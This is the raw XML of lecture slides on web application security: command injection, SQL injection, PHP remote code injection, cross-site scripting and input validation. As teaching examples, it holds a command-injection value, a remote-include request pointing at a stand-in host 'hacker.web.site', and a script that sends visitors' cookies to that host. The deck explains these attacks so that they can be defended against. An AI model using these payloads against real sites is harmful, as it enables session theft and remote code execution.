                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxx; echo attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="26269A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="26269A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>success;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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63415" y="1006855"/>
            <a:ext cx="21323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Safer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Script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51458" y="2061474"/>
            <a:ext cx="6986270" cy="160020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Counter attack by validating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input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compare to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pattern that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accepts valid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-1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input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see </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>example additions to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script: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0781" y="4024531"/>
            <a:ext cx="8727440" cy="1260475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="29660">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="73660" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="585470" indent="-472440">
              <a:lnSpc>
                <a:spcPts val="1780"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
                <a:tab pos="586105" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># get name of user and display their finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="586105" indent="-473075">
              <a:lnSpc>
                <a:spcPts val="1705"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="586105" algn="l"/>
                <a:tab pos="586740" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;param("user");</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113030" marR="1868805">
              <a:lnSpc>
                <a:spcPts val="1710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
                <a:tab pos="586105" algn="l"/>
                <a:tab pos="1058545" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>die "The specified user contains illegal characters!"  17		unless ($user =~</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/^\w+$/);</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113030">
              <a:lnSpc>
                <a:spcPts val="1670"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>18	print `/usr/bin/finger -sh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user`;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11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77309" y="1022095"/>
            <a:ext cx="2303145" cy="544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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="-130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6734047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13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69339" y="2188718"/>
            <a:ext cx="7760970" cy="3492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93725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Covered when we talked about database  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security.</a:t>
            </a:r>
            <a:endParaRPr sz="35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2100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SQL injection attacks are best prevented</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>by  good coding practices because they rely on  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>services </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>that must be available for ordinary  operation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>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24147" y="1006855"/>
            <a:ext cx="2609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Code</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Injection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87550"/>
            <a:ext cx="7297420" cy="258699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Further </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variant on injection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attacks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Input includes code that is then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executed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see PHP remote code injection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vulnerability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variable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>global field variables </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>remote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include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this type of attack is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>widely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exploited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40216" y="6871969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14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8952" y="5055089"/>
            <a:ext cx="8135620" cy="771525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="27470">
            <a:solidFill>
              <a:srgbClr val="00000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105410">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" marR="4384675">
              <a:lnSpc>
                <a:spcPts val="1590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>include $path . 'functions.php';  include $path .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'data/prefs.php';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8952" y="6064739"/>
            <a:ext cx="8135620" cy="367665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="27470">
            <a:solidFill>
              <a:srgbClr val="00000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105410">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/calendar/embed/day</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.php?path=http://hacker.web.site/hack.txt?&amp;cmd=ls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01138" y="1006855"/>
            <a:ext cx="5060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Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Attacks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8240395" cy="454977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Attacks where input from one user is later output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to  another </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for example, a user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includes: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ts val="2750"/>
              </a:lnSpc>
            </a:pP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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>… </a:t>
            </a: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evil code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3465"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Facebook, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Twitter,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Any supported script, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript,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ActiveX</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="171450" indent="-342900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Code is assumed to come from application on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>site,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as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site.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XSS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reflection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malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code supplied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site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subsequently </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>displayed to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>other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45016" y="6731760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15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6350" y="1006855"/>
            <a:ext cx="24263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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Example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33625"/>
            <a:ext cx="7361555" cy="32442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Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>possible in guest books, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wikis, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>blogs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Where comment includes script code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to collect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cookie details of viewing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Need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to validate data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supplied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including </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>handling various possible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encodings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Attacks both input and output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handling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7735" y="5521071"/>
            <a:ext cx="8126730" cy="768985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="17526">
            <a:solidFill>
              <a:srgbClr val="000000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105410">
              <a:lnSpc>
                <a:spcPts val="1655"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Thanks for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>information, its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>great!</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" marR="1200150">
              <a:lnSpc>
                <a:spcPts val="1590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://hacker.web.site/cookie.cgi?'+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie&lt;/script&gt;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3890" y="5644134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40" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894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3890" y="5644134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40" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894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3890" y="5644134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40" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894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43890" y="5644134"/>
            <a:ext cx="40640" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40640" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894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1336" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38909" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386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52242" y="1006855"/>
            <a:ext cx="41516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Validating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Syntax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32874"/>
            <a:ext cx="7792720" cy="476313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ensure input data meets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="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assumptions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printable, HTML, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>email, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>userid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etc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Compare to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is known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acceptable…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..not to known dangerous (enumerating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badness)  as this can miss new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problems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Common to use regular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expressions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pattern </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of characters describe allowable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input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details vary between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languages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Bad input either rejected or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altered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93795" y="1006855"/>
            <a:ext cx="36722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Alternate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Encodings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42"/>
            <a:ext cx="7470140" cy="426656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May </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have multiple means of encoding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text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due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structured form of data, e.g.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HTML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or via use of </a:t>
            </a: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spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>character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Unicode used for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internationalization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uses 16-bit value for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characters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UTF-8 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>encodes as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1-4 byte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sequences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have </a:t>
            </a:r>
            <a:r>
